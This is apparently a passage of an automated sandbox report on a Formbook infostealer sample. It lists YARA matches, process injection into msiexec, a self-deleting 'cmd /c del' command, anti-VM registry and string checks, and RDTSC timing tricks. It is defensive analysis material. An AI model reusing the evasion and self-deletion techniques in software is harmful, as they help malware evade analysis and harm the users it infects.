            Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: YvGnm93rap.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: YvGnm93rap.exe, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: YvGnm93rap.exe, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: YvGnm93rap.exe, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@19/7
            Source: C:\Users\user\Desktop\YvGnm93rap.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YvGnm93rap.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_01
            Source: YvGnm93rap.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\YvGnm93rap.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: YvGnm93rap.exeVirustotal: Detection: 46%
            Source: YvGnm93rap.exeReversingLabs: Detection: 26%
            Source: unknownProcess created: C:\Users\user\Desktop\YvGnm93rap.exe 'C:\Users\user\Desktop\YvGnm93rap.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\YvGnm93rap.exe {path}
            Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\YvGnm93rap.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess created: C:\Users\user\Desktop\YvGnm93rap.exe {path}Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\YvGnm93rap.exe'Jump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: YvGnm93rap.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: YvGnm93rap.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: YvGnm93rap.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: msiexec.pdb source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
            Source: Binary string: msiexec.pdbGCTL source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: YvGnm93rap.exe, 00000002.00000003.226603868.0000000000BA0000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: YvGnm93rap.exe

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: YvGnm93rap.exe, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Binary contains a suspicious time stampShow sources
            Source: initial sampleStatic PE information: 0x87A8763C [Fri Feb 14 04:21:16 2042 UTC]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041C952 push 06E61A6Ah; ret 2_2_0041C973
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041C932 push 06E61A6Ah; ret 2_2_0041C973
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B3B5 push eax; ret 2_2_0041B408
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B46C push eax; ret 2_2_0041B472
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B402 push eax; ret 2_2_0041B408
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B40B push eax; ret 2_2_0041B472
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F4D0D1 push ecx; ret 2_2_00F4D0E4
            Source: initial sampleStatic PE information: section name: .text entropy: 7.87823365772
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: YvGnm93rap.exe PID: 2396, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\YvGnm93rap.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\YvGnm93rap.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 0000000002E485E4 second address: 0000000002E485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 0000000002E4897E second address: 0000000002E48984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004088B0 rdtsc 2_2_004088B0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exe TID: 1004Thread sleep time: -31500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exe TID: 2616Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 4604Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6932Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6932Thread sleep time: -76000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: VMware
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: explorer.exe, 00000003.00000000.239789779.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&L
            Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000003.00000000.245156332.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.240164900.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000003.00000000.245453797.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
            Source: explorer.exe, 00000003.00000003.562890431.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: VMware
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004088B0 rdtsc 2_2_004088B0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00409B20 LdrLoadDll,2_2_00409B20
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF58EC mov eax, dword ptr fs:[00000030h]2_2_00EF58EC
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF40E1 mov eax, dword ptr fs:[00000030h]2_2_00EF40E1
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF40E1 mov eax, dword ptr fs:[00000030h]2_2_00EF40E1
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF40E1 mov eax, dword ptr fs:[00000030h]2_2_00EF40E1
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B8E4 mov eax, dword ptr fs:[00000030h]2_2_00F1B8E4
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B8E4 mov eax, dword ptr fs:[00000030h]2_2_00F1B8E4
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]2_2_00F8B8D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8B8D0 mov ecx, dword ptr fs:[00000030h]2_2_00F8B8D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]2_2_00F8B8D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]2_2_00F8B8D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]2_2_00F8B8D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]2_2_00F8B8D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2F0BF mov ecx, dword ptr fs:[00000030h]2_2_00F2F0BF
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2F0BF mov eax, dword ptr fs:[00000030h]2_2_00F2F0BF
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2F0BF mov eax, dword ptr fs:[00000030h]2_2_00F2F0BF
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]2_2_00F220A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]2_2_00F220A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]2_2_00F220A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]2_2_00F220A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]2_2_00F220A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]2_2_00F220A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F390AF mov eax, dword ptr fs:[00000030h]2_2_00F390AF
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF9080 mov eax, dword ptr fs:[00000030h]2_2_00EF9080
            Source: C:\Users\user\Desktop\YvGnm93rap.exe